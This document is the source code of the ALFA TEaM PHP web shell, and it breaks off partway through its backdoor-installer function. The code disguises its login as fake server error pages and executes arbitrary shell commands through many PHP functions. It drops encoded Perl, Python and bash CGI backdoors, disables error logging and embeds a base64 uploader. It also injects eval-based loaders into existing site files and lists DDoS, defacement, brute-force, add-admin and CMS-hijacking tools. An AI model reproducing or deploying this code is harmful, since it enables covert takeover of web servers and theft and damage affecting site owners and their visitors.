~ ALFA TEaM Shell-v`.__ALFA_VERSION__.` ~

Login: Password: &nbsp; `; exit; } }elseif($config[`AlfaLoginPage`]==`500`){ if(@$_SESSION["AlfaPass"] != @md5($config[`AlfaPass`])){ if(@md5($_POST["password"])==$config[`AlfaPass`]){ @$_SESSION["AlfaUser"] = $config[`AlfaUser`]; @$_SESSION["AlfaPass"] = @md5($config[`AlfaPass`]); header(`location: `.$_SERVER["PHP_SELF"]); } echo ` Internal Server Error The server encountered an internal error or misconfiguration and was unable to complete your request. Please contact the server administrator, `.$_SERVER[`SERVER_ADMIN`].` and inform them of the time the error occurred, and anything you might have done that may have caused the error. More information about this error may be available in the server error log. `.$SERVER_SIG.``.$Eform; exit; } }elseif($config[`AlfaLoginPage`]==`403`){ if(@$_SESSION["AlfaPass"] != @md5($config[`AlfaPass`])){ if(@md5($_POST["password"])==$config[`AlfaPass`]){ @$_SESSION["AlfaUser"] = $config[`AlfaUser`]; @$_SESSION["AlfaPass"] = @md5($config[`AlfaPass`]); header(`location: `.$_SERVER["PHP_SELF"]); } echo " Forbidden You don`t have permission to access ".$_SERVER[`PHP_SELF`]." on this server. ".$SERVER_SIG."".$Eform; exit; } }elseif($config[`AlfaLoginPage`]==`404`){ if(@$_SESSION["AlfaPass"] != @md5($config[`AlfaPass`])){ if(@md5($_POST["password"])==$config[`AlfaPass`]){ @$_SESSION["AlfaUser"] = $config[`AlfaUser`]; @$_SESSION["AlfaPass"] = @md5($config[`AlfaPass`]); header(`location: `.$_SERVER["PHP_SELF"]); } echo " Not Found The requested URL ".$_SERVER[`PHP_SELF`]." was not found on this server. Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request. ".$SERVER_SIG."".$Eform; exit; } } } function decrypt_post($str, $pwd){     if(__ALFA_POST_ENCRYPTION__){         $pwd     = __ZW5jb2Rlcg($pwd);         $str     = __ZGVjb2Rlcg($str);         $enc_chr = "";         $enc_str = "";         $i       = 0;         while ($i < strlen($str)) {             for ($j = 0; $j < strlen($pwd); $j++) {                 $enc_chr = chr(ord($str[$i]) ^ ord($pwd[$j]));                 $enc_str .= $enc_chr;                 $i++;                 if ($i >= strlen($str))                     break;             }         }         return __ZGVjb2Rlcg($enc_str);     }else{         return __ZGVjb2Rlcg($str);     } } function _AlfaSecretKey(){     if(!isset($_SESSION["AlfaSecretKey"])){         $_SESSION["AlfaSecretKey"] = uniqid(mt_rand(), true);     }     return $_SESSION["AlfaSecretKey"]; } function alfa_getColor($target){     if(isset($GLOBALS["DB_NAME"]["color"][$target])&&$GLOBALS["DB_NAME"]["color"][$target]!=""){         return $GLOBALS["DB_NAME"]["color"][$target];     }else{         $target = $GLOBALS["__ALFA_COLOR__"][$target];         if(is_array($target)){             return $target["key_color"];         }else{             return $target;         }     } } function alfaCssLoadColors(){     $css = "";     foreach($GLOBALS[`__ALFA_COLOR__`] as $key => $value){         if(!is_array($value)){             $value = alfa_getColor($key);             $css .= ".{$key}{color: {$value};}";         }else{             if(isset($value["multi_selector"])){                 foreach($value["multi_selector"] as $k => $v){                     $color = alfa_getColor($key);                     $code = str_replace("{color}", $color, $v);                     $css .=  $k."{".$code."}";                 }             }         }     }     return $css; } if(isset($_POST[`ajax`])){ function AlfaNum(){ $args = func_get_args(); $alfax = array(); $find = array(); for($i=1;$i<=10;$i++){ $alfax[] = $i; } foreach($args as $arg){ $find[] = $arg; } echo ``; }} function _alfa_cgicmd($cmd,$lang="perl"){     if(isset($_SESSION["alfacgiapi_mode"])){         return "";     }     $cmd_pure = $cmd;     $is_curl = function_exists(`curl_version`);     $is_socket = function_exists(`fsockopen`);     if($is_curl||$is_socket){         $recreate = false;         if(isset($_SESSION["alfacgiapi"])){             if(!@file_exists("alfacgiapi/".$_SESSION["alfacgiapi"].".alfa")){                 $recreate = true;                 $lang = $_SESSION["alfacgiapi"];             }         }         if(!isset($_SESSION["alfacgiapi"])||$recreate){             @chdir(dirname($_SERVER["SCRIPT_FILENAME"]));             $perl = `jZFRT8IwFIXf/RXXOqWNsKoxPlAwRliERIbK9EUMGdsFGrYyt2Iky/ztdkMlJj74cpKee853k96Dfb7OUj6ViieYRgDQ6FdOtAr8iE99FcZS7a0zhEF/4DSb136GF+ciSaXSQDorpVHpht4k2ASN75ovdByN1VgRIWfUctynvPbg3D86I28ycLzesFsrAF+B3A1HHmF5vAFqyTpYS9wYffMjo1IxkaIf0pHX7buVYaRidYau57je5NZxb7xerWDiSipoQ5ZEUlN+xL/qs5UBBAvzAHoCtg3WgbFzM3u25Au0PyDj42MOfC7objfbkdpbUpmuwxkTZWhbO6S2zXjiB0tKAlKHBb5T65QxPkdRQv6RkioveQXYbSDjEwJyBjTEmVQY0p8pY7+TJVwU5bcalwRxSAqWby8RYrAKcTKtrvM1X2CwNAmbtJIUL4nINpnGmP4VrVDs+6otXhWK4hM=`;             $py = "bZDBS8MwGMXPy19R66EtzhRk7DA3L1rxItOt3gajTb6twTQJydexIf7vJqvMiR5CyHvv93jk8iLvnM1roXJzwEYrgvYwIQPRGm0xYluB9W1/UVBVLSHNCOwZGPQpUzlHvqPaDX1sWFcOxiOy0baNZgGkjwIkX6K21RZSUDthtZp9JIvi9a1YluvnonyaPyST5GW+LJPPjLCWezIU0C3grpIdpIkXE281wN7/MYPsbWOFwii+1wpB4TUeDEwQ9pg32MqVXalwYiI2ka8L84/5fjGtxyMOTHNIj3XZVTw1Fu5iMmCNkHztkAs1jE4P3aFfoh012oC6Sf/WtDzLftGUSe3CBw4suE4G/ryOWqh4eo4E8cT0a3uSOrTC/KjxND+O/QI=";             $bash = "rVRdj5pAFH2uv+I6DGa1Iaybpg9amrRboptYbV360JQGWRiFyPI5WreU/95hoCyjsfFh52nm3nM/zuTcK3XVBz9UH+zM6xDHi0AhgG6jkJKQKvQpJiOg5EBVjz4GZmiGqLPehQ71oxCcjW9tCLW+LO4Na2+n2VU/7wA7PwDhpf71m87sn3VjuviEoKsBKoEIfkKvBymhuzSs0V1QfrMQFrD8bt0by7v5xDqH5cjbxdzQ54Y10+cTYyrCXqXEdkGZwxEKTtLzjHVUIdJyiRO5hHF6poQlUEICw5OegsixA9gDBY+/qYZwPlTV1yoUsoy47ZfnB6RMkku0AGVD4RoUmzHJaVH9jcxYjMGNOLw8+zLNvmAIWTblQYEaDy9ApYHcsvnrC7JTj4RNRHk8jUFG16ObQjBXBZgVCea6I7T6pxOTnQPOvWLV4NY+v7pRSPiFQ6uw/3w3U5Gon/KzAwo3Zz47gRi27MszbnPsjAAegv9MbqIbfaH3RmR5WwZFLZ1EO3b0ROrjcfMslSPmPpmDCypz8Nnylfd8Dx8XxvRF+b0MhaS4nAbJbIdfMs9f0+qmIcADECemrpwcj0fMC8pyrz0Z29IYy7LWNnLZxtJAa9mqdiUcC+Hl3hoiYPPyYTZDoHDlZirgLaj1IOGsJmwKpMghjlLK3FukoZWwQcBEeG+iFRIHoxmElv65toDV7iQ7kj5p+IqPD3YeXfgDbEWTt29AUarU/WpdNxiPONuzqHKpv4tT8t50UId1FbBdwWsULb9aA/4C";             if($lang=="perl")$source = $perl;elseif($lang=="py")$source = $py;else $source = $bash;             alfaWriteTocgiapi($lang.".alfa",$source);             alfacgihtaccess(`cgi`, "alfacgiapi/");         }else{             $lang = $_SESSION["alfacgiapi"];         }         $cmd = "check=W3NvbGV2aXNpYmxlfmFwaV0=&cmd=".__ZW5jb2Rlcg("cd ".$GLOBALS[`cwd`].";".$cmd);         if($is_curl){             $address = ($_SERVER[`SERVER_PORT`] == 443 ? "https://" : "http://").$_SERVER["SERVER_NAME"].dirname($_SERVER["REQUEST_URI"])."/alfacgiapi/".$lang.".alfa";             $post = new AlfaCURL();             $data = $post->Send($address, "post", $cmd);         }elseif($is_socket){             $server = $_SERVER["SERVER_NAME"];             $uri = dirname($_SERVER["REQUEST_URI"])."/alfacgiapi/".$lang.".alfa";             $data = _alfa_fsockopen($server,$uri,$cmd);         }         $out = "";         if(strstr($data, "[solevisible~api]")){             $_SESSION["alfacgiapi"] = $lang;             if(@preg_match("/ (.*?) /s", $data, $res)){                 $out = $res[1];             }         }elseif($lang=="perl"){             return _alfa_cgicmd($cmd_pure,"py");         }elseif($lang=="py"){             return _alfa_cgicmd($cmd_pure,"bash");         }else{             $_SESSION["alfacgiapi_mode"] = "off";         }         return trim($out);     }else{         return "";     } } function alfaEx($in,$re=false,$cgi=true,$all=false){     $data = _alfa_php_cmd($in,$re);     if(empty($data)&&$cgi||$all){         if($GLOBALS[`sys`]==`unix`){             if(strlen(_alfa_php_cmd("whoami"))==0||$all){                 $cmd = _alfa_cgicmd($in);                 if(!empty($cmd)){                     return $cmd;                 }             }         }     }     return $data; } function _alfa_php_cmd($in,$re=false){ $out=``; try{ if($re)$in=$in." 2>&1"; if(function_exists(`exec`)){ @exec($in,$out); $out = @join(" ",$out); }elseif(function_exists(`passthru`)) { ob_start(); @passthru($in); $out = ob_get_clean(); }elseif(function_exists(`system`)){ ob_start(); @system($in); $out = ob_get_clean(); } elseif (function_exists(`shell_exec`)) { $out = shell_exec($in); }elseif(function_exists("popen")&&function_exists("pclose")){ if(is_resource($f = @popen($in,"r"))){ $out = ""; while(!@feof($f)) $out .= fread($f,1024); pclose($f); } }elseif(function_exists(`proc_open`)){ $pipes = array(); $process = @proc_open($in.` 2>&1`, array(array("pipe","w"), array("pipe","w"), array("pipe","w")), $pipes, null); $out=@stream_get_contents($pipes[1]); }elseif(class_exists(`COM`)){ $alfaWs = new COM(`WScript.shell`); $exec = $alfaWs->exec(`cmd.exe /c `.$_POST[`alfa1`]); $stdout = $exec->StdOut(); $out=$stdout->ReadAll(); } }catch(Exception $e){} return $out; } function _alfa_fsockopen($server,$uri,$post){     $socket = @fsockopen($server, 80, $errno, $errstr, 15);     if($socket){         $http  = "POST {$uri} HTTP/1.0 ";         $http .= "Host: {$server} ";         $http .= "User-Agent: " . $_SERVER[`HTTP_USER_AGENT`] . " ";         $http .= "Content-Type: application/x-www-form-urlencoded ";         $http .= "Content-length: " . strlen($post) . " ";         $http .= "Connection: close ";         $http .= $post . " ";         fwrite($socket, $http);         $contents = "";         while (!@feof($socket)) {             $contents .= @fgets($socket, 4096);         }         list($header, $body) = explode(" ", $contents, 2);         @fclose($socket);         return $body;     }else{         return "";     } } if(isset($_GET["solevisible"])){ @error_reporting(E_ALL ^ E_NOTICE); echo ``; echo ""; echo ""; echo `Kernel : `.(function_exists(`php_uname`)?php_uname():`???`).``; $safe_mode = @ini_get(`safe_mode`); if($safe_mode){$r = "On";}else{$r = "Off";} echo " OS: " . PHP_OS . " "; echo "Software: " . $_SERVER [`SERVER_SOFTWARE`] . " "; echo "PHP Version: " . PHP_VERSION .  " "; echo "PWD: " . str_replace("","/",@getcwd()) . "/ "; echo "Safe Mode : $r "; echo"Disable functions : "; $disfun = @ini_get(`disable_functions`); if(empty($disfun)){$disfun = `NONE`;} echo""; echo "$disfun"; echo" "; echo "Your Ip Address is :  " . $_SERVER[`REMOTE_ADDR`] . " "; echo "Server Ip Address is :  ".(function_exists(`gethostbyname`)?@gethostbyname($_SERVER["HTTP_HOST"]):`???`)." "; echo ` `; echo `CWD: `; if(isset($_FILES[`file`])){ if(@move_uploaded_file($_FILES[`file`][`tmp_name`], __ZGVjb2Rlcg(@$_POST[`cwd`]).`/`.$_FILES[`file`][`name`])){echo `Upload Successfully ;) `; } else{echo `Upload failed :( `; } } echo ` Execute Command: `; if(isset($_POST[`command_solevisible`])){ if(strtolower(substr(PHP_OS,0,3))=="win")$separator=`&`;else $separator=`;`; $solevisible = "cd `".addslashes(str_replace("","/",@getcwd()))."`".$separator."".__ZGVjb2Rlcg($_POST[`command_solevisible`]); echo alfaEx($solevisible); } echo` `; exit;} @error_reporting(E_ALL ^ E_NOTICE); @ini_set(`error_log`,NULL); @ini_set(`log_errors`,0); @ini_set(`max_execution_time`,0); @ini_set(`magic_quotes_runtime`, 0); @set_time_limit(0); if(function_exists(`set_magic_quotes_runtime`)){ @set_magic_quotes_runtime(0); } foreach($_POST as $key => $value){ if(is_array($_POST[$key])){ $i=0; foreach($_POST[$key] as $f) { $f = trim(str_replace(` `, `+`,$f)); $_POST[$key][$i] = decrypt_post($f, _AlfaSecretKey()); $i++; } }else{ $value = trim(str_replace(` `, `+`,$value)); $_POST[$key] = decrypt_post($value, _AlfaSecretKey()); } } $default_action = `FilesMan`; $default_use_ajax = true; $default_charset = `Windows-1251`; if(strtolower(substr(PHP_OS,0,3))=="win") $GLOBALS[`sys`]=`win`; else $GLOBALS[`sys`]=`unix`; $GLOBALS[`home_cwd`] = @getcwd(); if($_POST["a"] != "GetPathHistory"){     if($_SESSION[__LAST_CWD__]!=$_POST[`c`]){         $_SESSION[__PATH_HISTORY__] = $_SESSION[__LAST_CWD__];     } } $GLOBALS["need_to_update_header"] = "false"; if(isset($_POST[`c`])){ if(!@chdir($_POST[`c`])){     $GLOBALS[`glob_chdir_false`] = true; } } $GLOBALS[`cwd`] = (isset($_SESSION[__LAST_CWD__])&&$_SESSION[__LAST_CWD__]!=``&&!isset($_POST[`c`])?$_SESSION[__LAST_CWD__]:@getcwd()); if(!@is_dir){$GLOBALS[`cwd`] = @getcwd();} if($GLOBALS[`sys`] == `win`){ $GLOBALS[`home_cwd`] = str_replace("", "/", $GLOBALS[`home_cwd`]); $GLOBALS[`cwd`] = str_replace("", "/", $GLOBALS[`cwd`]); $_SESSION[__PATH_HISTORY__] = str_replace("", "/", $_SESSION[__PATH_HISTORY__]); } if($GLOBALS[`cwd`][strlen($GLOBALS[`cwd`])-1] != `/` )$GLOBALS[`cwd`] .= `/`; function alfaGetPathHistory(){echo (isset($_SESSION[__PATH_HISTORY__])&&!empty($_SESSION[__PATH_HISTORY__])?$_SESSION[__PATH_HISTORY__]: $GLOBALS[`home_cwd`]);} function alfahead(){ if(!function_exists(`sys_get_temp_dir`)){function sys_get_temp_dir() {foreach (array(`TMP`, `TEMP`, `TMPDIR`) as $env_var) {if ($temp = getenv($env_var)) {return $temp;}}$temp = tempnam($GLOBALS[`__file_path`], ``);if (_alfa_file_exists($temp,false)) {unlink($temp);return dirname($temp);}return null;}} $GLOBALS[`__ALFA_SHELL_CODE`] = `PD9waHAgZWNobyAiPHRpdGxlPlNvbGV2aXNpYmxlIFVwbG9hZGVyPC90aXRsZT5cbjxib2R5IGJnY29sb3I9IzAwMDAwMD5cbjxicj5cbjxjZW50ZXI+PGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjxiPllvdXIgSXAgQWRkcmVzcyBpczwvYj4gPGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjwvZm9udD48L2NlbnRlcj5cbjxiaWc+PGZvbnQgY29sb3I9XCIjN0NGQzAwXCI+PGNlbnRlcj5cbiI7ZWNobyAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTtlY2hvICI8L2NlbnRlcj48L2ZvbnQ+PC9hPjxmb250IGNvbG9yPVwiIzdDRkMwMFwiPlxuPGJyPlxuPGJyPlxuPGNlbnRlcj48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48YmlnPlNvbGV2aXNpYmxlIFVwbG9hZCBBcmVhPC9iaWc+PC9mb250PjwvYT48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48L2ZvbnQ+PC9jZW50ZXI+PGJyPlxuPGNlbnRlcj48Zm9ybSBtZXRob2Q9J3Bvc3QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnIG5hbWU9J3VwbG9hZGVyJz4iO2VjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI0NSI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT48L2NlbnRlcj4nO2lmKGlzc2V0KCRfUE9TVFsnX3VwbCddKSYmJF9QT1NUWydfdXBsJ109PSAiVXBsb2FkIil7aWYoQG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkge2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBTdWNjZXNzZnVsbHkgOyk8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO31lbHNle2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBmYWlsZWQgOig8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO319ZWNobyAnPGNlbnRlcj48c3BhbiBzdHlsZT0iZm9udC1zaXplOjMwcHg7IGJhY2tncm91bmQ6IHVybCgmcXVvdDtodHRwOi8vc29sZXZpc2libGUuY29tL2ltYWdlcy9iZ19lZmZlY3RfdXAuZ2lmJnF1b3Q7KSByZXBlYXQteCBzY3JvbGwgMCUgMCUgdHJhbnNwYXJlbnQ7IGNvbG9yOiByZWQ7IHRleHQtc2hhZG93OiA4cHggOHB4IDEzcHg7Ij48c3Ryb25nPjxiPjxiaWc+c29sZXZpc2libGVAZ21haWwuY29tPC9iPjwvYmlnPjwvc3Ryb25nPjwvc3Bhbj48L2NlbnRlcj4nOz8+`; $alfa_uploader = `$x = base64_decode("`.$GLOBALS[`__ALFA_SHELL_CODE`].`");$solevisible = fopen("solevisible.php","w");fwrite($solevisible,$x);`; define("ALFA_UPLOADER", "eval(base64_decode(`".__ZW5jb2Rlcg($alfa_uploader)."`))"); define("ALFA_TEMPDIR", (function_exists("sys_get_temp_dir") ? (@is_writable(str_replace(`\`,`/`,sys_get_temp_dir()))?sys_get_temp_dir():(@is_writable(`.`)?`.`:false)) : false)); if(!isset($_POST[`ajax`])){ function Alfa_GetDisable_Function(){ $disfun = @ini_get(`disable_functions`); $afa = `All Functions Accessible`; if(empty($disfun))return($afa); $s = explode(`,`,$disfun); $s = array_unique($s); $i=0; $b=0; $func = array(`system`,`exec`,`shell_exec`,`proc_open`,`popen`,`passthru`,`symlink`,`dl`); $black_list = array(); $allow_list = array(); foreach($s as $d){     $d=trim($d);     if(empty($d)||!is_callable($d))continue;     if(!function_exists($d)){         if(in_array($d,$func)){             $dis .= $d." | ";$b++;             $black_list[] = $d;         }else{             $allow_list[] = $d;         }         $i++;     } } if($i==0)return($afa); if($i <= count($func)){ $all = array_values(array_merge($black_list, $allow_list)); return(``.implode(" | ", $all).``); } return(``.$dis.`Show All (`.$i.`)`); } function AlfaNum(){ $args = func_get_args(); $alfax = array(); $find = array(); for($i=1;$i<=10;$i++){ $alfax[] = $i; } foreach($args as $arg){ $find[] = $arg; } echo ``; } if(empty($_POST[`charset`])) $_POST[`charset`] = $GLOBALS[`default_charset`]; $freeSpace = function_exists(`diskfreespace`)?@diskfreespace($GLOBALS[`cwd`]):`?`; $totalSpace = function_exists(`disk_total_space`)?@disk_total_space($GLOBALS[`cwd`]):`?`; $totalSpace = $totalSpace?$totalSpace:1; $on=" ON "; $of=" OFF "; $none=" NONE "; if(function_exists(`ssh2_connect`)) $ssh2=$on; else $ssh2=$of; if(function_exists(`curl_version`)) $curl=$on; else $curl=$of; if(function_exists(`mysql_get_client_info`)) $mysql=$on; else $mysql=$of; if(function_exists(`mssql_connect`)) $mssql=$on; else $mssql=$of; if(function_exists(`pg_connect`)) $pg=$on; else $pg=$of; if(function_exists(`oci_connect`)) $or=$on; else $or=$of; if(@ini_get(`disable_functions`)) $disfun=@ini_get(`disable_functions`); else $disfun="All Functions Enable"; if(@ini_get(`safe_mode`)) $safe_modes="ON"; else $safe_modes="OFF"; $cgi_shell="OFF"; if(@ini_get(`open_basedir`)){ $basedir_data = @ini_get(`open_basedir`); if(strlen($basedir_data)>120){ $open_b=substr($basedir_data,0, 120)."..."; }else{ $open_b = $basedir_data; } }else{$open_b=$none;} if(@ini_get(`safe_mode_exec_dir`)) $safe_exe=@ini_get(`safe_mode_exec_dir`); else $safe_exe=$none; if(@ini_get(`safe_mode_include_dir`)) $safe_include=@ini_get(`safe_mode_include_dir`); else $safe_include=$none; if(!function_exists(`posix_getegid`)) { $user = function_exists("get_current_user")?@get_current_user():"????"; $uid = function_exists("getmyuid")?@getmyuid():"????"; $gid = function_exists("getmygid")?@getmygid():"????"; $group = "?"; }else{ $uid = function_exists("posix_getpwuid")&&function_exists("posix_geteuid")?@posix_getpwuid(posix_geteuid()):array("name"=>"????", "uid"=>"????"); $gid = function_exists("posix_getgrgid")&&function_exists("posix_getegid")?@posix_getgrgid(posix_getegid()):array("name"=>"????", "gid"=>"????"); $user = $uid[`name`]; $uid = $uid[`uid`]; $group = $gid[`name`]; $gid = $gid[`gid`]; } $cwd_links = ``; $path = explode("/", $GLOBALS[`cwd`]); $n=count($path); for($i=0; $i<$n-1; $i++) { $cwd_links .= " for($j=0; $j<=$i; $j++) $cwd_links .= $path[$j].`/`; $cwd_links .= "")`>".$path[$i]."/"; } $drives = ""; foreach(range(`a`,`z`) as $drive) if(@is_dir($drive.`:\`)) $drives .= `[ `.$drive.` ] `; $csscode =`    -moz-animation-name: spin;-moz-animation-iteration-count: infinite;-moz-animation-timing-function: linear;-moz-animation-duration: 1s;-webkit-animation-name: spin;-webkit-animation-iteration-count: infinite;-webkit-animation-timing-function: linear;-webkit-animation-duration: 1s;-ms-animation-name: spin;-ms-animation-iteration-count: infinite;-ms-animation-timing-function: linear;-ms-animation-duration: 1s;animation-name: spin;animation-iteration-count: infinite;animation-timing-function: linear;animation-duration: 1s;`; echo ` `; echo " "; $cmd_uname = alfaEx("uname -a",false,false); $uname = function_exists(`php_uname`) ? substr(@php_uname(), 0, 120) : (strlen($cmd_uname)>0?$cmd_uname:`( php_uname ) Function Disabled !`); if($uname=="( php_uname ) Function Disabled !"){$GLOBALS["need_to_update_header"]="true";} echo ` `; for($s=1;$s<=10;$s++){ echo ``; } echo ` Hidden Shell Version: `.__ALFA_VERSION__.` `; if($GLOBALS[`sys`]==`unix`){ $useful_downloader = ``; if(!@ini_get(`safe_mode`)){ if(strlen(alfaEx("id",false,false))>0){ echo ` `; }else{ echo $useful_downloader;$GLOBALS["need_to_update_header"] = "true"; } }else{ echo $useful_downloader;$GLOBALS["need_to_update_header"] = "true"; } }else{ echo ` `; } $quotes = (function_exists(`get_magic_quotes_gpc`)?get_magic_quotes_gpc():`0`);if ($quotes == "1" or $quotes == "on"){$magic = `ON`;}else{$magic = `OFF`;} echo ` `; if($GLOBALS[`sys`]=="win"){ echo ` `; } echo ` Uname: `.$uname.` User: `. $uid . ` [ ` . $user . ` ] Group: ` . $gid . ` [ ` . $group . ` ] PHP: `.@phpversion(). ` Safe Mode: `.$safe_modes.` ServerIP: `.(!@$_SERVER["SERVER_ADDR"]?(function_exists("gethostbyname")?@gethostbyname($_SERVER[`SERVER_NAME`]):`????`):@$_SERVER["SERVER_ADDR"]).` Your IP: `.@$_SERVER["REMOTE_ADDR"].` DateTime: `.date(`Y-m-d H:i:s`).` Domains: `; if($GLOBALS[`sys`]==`unix`){ $d0mains = _alfa_file("/etc/named.conf",false); if(!$d0mains){echo "Cant Read [ /etc/named.conf ]";$GLOBALS["need_to_update_header"]="true";}else{ $count=0; foreach($d0mains as $d0main){ if(@strstr($d0main,"zone")){ preg_match_all(`#zone "(.*)"#`, $d0main, $domains); flush(); if(strlen(trim($domains[1][0])) > 2){ flush(); $count++;}}} echo "$count Domains";}} else{echo("Cant Read [ /etc/named.conf ]");} echo ` HDD: Total:`.alfaSize($totalSpace).` Free:` . alfaSize($freeSpace) . ` [`. (int) ($freeSpace/$totalSpace*100) . `%] useful:-------------- Downloader: -------------- Useful : `; $userful = array(`gcc`,`lcc`,`cc`,`ld`,`make`,`php`,`perl`,`python`,`ruby`,`tar`,`gzip`,`bzip`,`bzialfa2`,`nc`,`locate`,`suidperl`); $x=0; foreach($userful as $item)if(alfaWhich($item)){$x++;echo ``.$item.``;} if($x==0){echo "--------------";$GLOBALS["need_to_update_header"] = "true";} echo ` Downloader: `; $downloaders = array(`wget`,`fetch`,`lynx`,`links`,`curl`,`get`,`lwp-mirror`); $x=0; foreach($downloaders as $item2)if(alfaWhich($item2)){$x++;echo ``.$item2.``;} if($x==0){echo "--------------";$GLOBALS["need_to_update_header"] = "true";} echo ` Windows:`; echo alfaEx(`ver`,false,false); echo ` Downloader: ------------- Disable Functions: `.Alfa_GetDisable_Function().` CURL :`.$curl.` | SSH2 : `.$ssh2.` | Magic Quotes : `.$magic.` | MySQL :`.$mysql.` | MSSQL :`.$mssql.` | PostgreSQL :`.$pg.` | Oracle :`.$or.` `.($GLOBALS[`sys`]=="unix"?`| CGI : `.$cgi_shell:"").` Sole Sad & Invisible Open_basedir :`.$open_b.` | Safe_mode_exec_dir :`.$safe_exe.` | Safe_mode_include_dir :`.$safe_include.` SoftWare: `.@getenv(`SERVER_SOFTWARE`).` DRIVE: `.$drives.` PWD: `.$cwd_links.` [ Home Shell ] [ BACK ] `; $li = array(`FilesMan`=>`Home`,`proc`=>`Process`,`phpeval`=>`Eval`,`sql`=>`SQL Manager`,`dumper`=>`Mysql Dumper`,`hash`=>`En-Decoder`,`connect`=>`BC`,`ssh2`=>`SSH2`, `zoneh`=>`ZONE-H`,`dos`=>`DDOS`,`safe`=>`ByPasser`,`cgishell`=>`Cgi Shell`,`ssiShell`=>`SSI SHELL`,`cpcrack`=>`Hash Tools`, `portscanner`=>`Port Scaner`,`basedir`=>`Open BaseDir`,`mail`=>`Fake Mail`,`ziper`=>`Compressor`,`IndexChanger`=>`Index Changer`,`pwchanger`=>`Add New Admin`,`ShellInjectors`=>`Shell Injectors`, `php2xml`=>`PHP2XML`,`cloudflare`=>`CloudFlare`,`Whmcs`=>`Whmcs DeCoder`,`symlink`=>`Symlink`,`MassDefacer`=>`Mass Defacer`,`Crackers`=>`BruteForcer`,`searcher`=>`Searcher`, `cmshijacker`=>`CMS Hijacker`,`remotedl`=>`Remote Upload`,`inbackdoor`=>`Install BackDoor`,`whois`=>`Whois`,`settings`=>`Alfa Settings`,`plus`=>`Alfa +`,`selfrm`=>`Remove Shell` ); foreach($li as $key=>$value){ echo(` `.$value.` `." "); } if(!empty($_SESSION[`AlfaUser`]) && !empty($_SESSION[`AlfaPass`])) echo ` LogOut `; else echo ` `;}else{ @error_reporting(E_ALL ^ E_NOTICE); @ini_set(`error_log`,NULL); @ini_set(`log_errors`,0); @ini_set(`max_execution_time`,0); @ini_set(`magic_quotes_runtime`, 0); @set_time_limit(0); }} function alfalogout(){ unset($_SESSION[`AlfaUser`],$_SESSION[`AlfaPass`]); echo("Logout..."); } function showAnimation($name){     return `-webkit-animation: `.$name.` 800ms ease-in-out forwards;-moz-animation: `.$name.` 800ms ease-in-out forwards;-ms-animation: `.$name.` 800ms ease-in-out forwards;animation: `.$name.` 800ms ease-in-out forwards;`; } function __showicon($r){     $s[`btn`]=`http://solevisible.com/images/btn.png`;     $s[`alfamini`]=`http://solevisible.com/images/alfamini.png`;     $s[`loader`]=`http://solevisible.com/images/loader.png`;     //return `data:image/png;base64,`.__get_resource($s[$r]);     return $s[$r]; } function alfainbackdoor(){ alfahead(); echo ` | Install BackDoor | | In File | | In DataBase | `; $error = `Error In Inject BackDoor...! File Loader is not Writable Or Not Exists...!`; $success= `Success...!`; $textarea = " Your Shell: <?php echo(`Alfa Team is Here...!`); ?> "; $select = " Use: Alfa Team UploaderMy Private Shell"; $cwd = `Example: /home/alfa/public_html/index.php`; if($_POST[`alfa1`]==`file`){ echo(" | In File | {$select} Backdoor Loader: Key: {$textarea} "); if($_POST[`alfa2`]!=``&&$_POST[`alfa3`]!=``&&$_POST[`alfa4`]!=``){ $method = $_POST[`alfa2`]; $file = $_POST[`alfa3`]; $shell = $_POST[`alfa4`]; $key = str_replace(array(`"`,```),``,trim($_POST[`alfa5`])); if($key==``)$key=`alfa`; if($method==`my`){$shell=__ZW5jb2Rlcg($shell);}else{$shell=$GLOBALS[`__ALFA_SHELL_CODE`];} $code = ``.base"."64"."_dec"."ode($c));");$x("`.$shell.`");exit;}?>`; if(@is_file($file)&&@is_writable($file)){@file_put_contents($file,$code." ".@file_get_contents($file));__alert($success." Run With: ".basename($file)."?alfa=".$key.``);}else{__alert($error);}}} if($_POST[`alfa1`]==`db`){ echo(" | In DataBase | ".getConfigHtml(`all`)." "); $table = array(`td1` => array(`color` => `FFFFFF`, `tdName` => `db_host : `, `inputName` => `db_host`, `id` => `db_host`, `inputValue` => `localhost`, `inputSize` => `50`), `td2` => array(`color` => `FFFFFF`, `tdName` => `db_username : `, `inputName` => `db_username`, `id` => `db_user`, `inputValue` => ``, `inputSize` => `50`), `td3` => array(`color` => `FFFFFF`, `tdName` => `db_password : `, `inputName` => `db_password`, `id` => `db_pw`, `inputValue` => ``, `inputSize` => `50`), `td4` => array(`color` => `FFFFFF`, `tdName` => `db_name : `, `inputName` => `db_name`, `id` => `db_name`, `inputValue` => ``, `inputSize` => `50`), `td5` => array(`color` => `FFFFFF`, `tdName` => `Backdoor Loader: `, `inputName` => `file`, `inputValue` => $cwd, `inputSize` => `50`, `placeholder` => true), `td6` => array(`color` => `FFFFFF`, `tdName` => `Key: `, `inputName` => `key`, `inputValue` => `alfa`, `inputSize` => `50`) ); create_table($table); echo(" {$select} "); echo($textarea); echo(" "); if($_POST[`alfa2`]!=``&&$_POST[`alfa3`]!=``&&$_POST[`alfa5`]!=``&&$_POST[`alfa6`]!=``){ $dbhost = $_POST[`alfa2`]; $dbuser = $_POST[`alfa3`]; $dbpw = $_POST[`alfa4`]; $dbname = $_POST[`alfa5`]; $file = 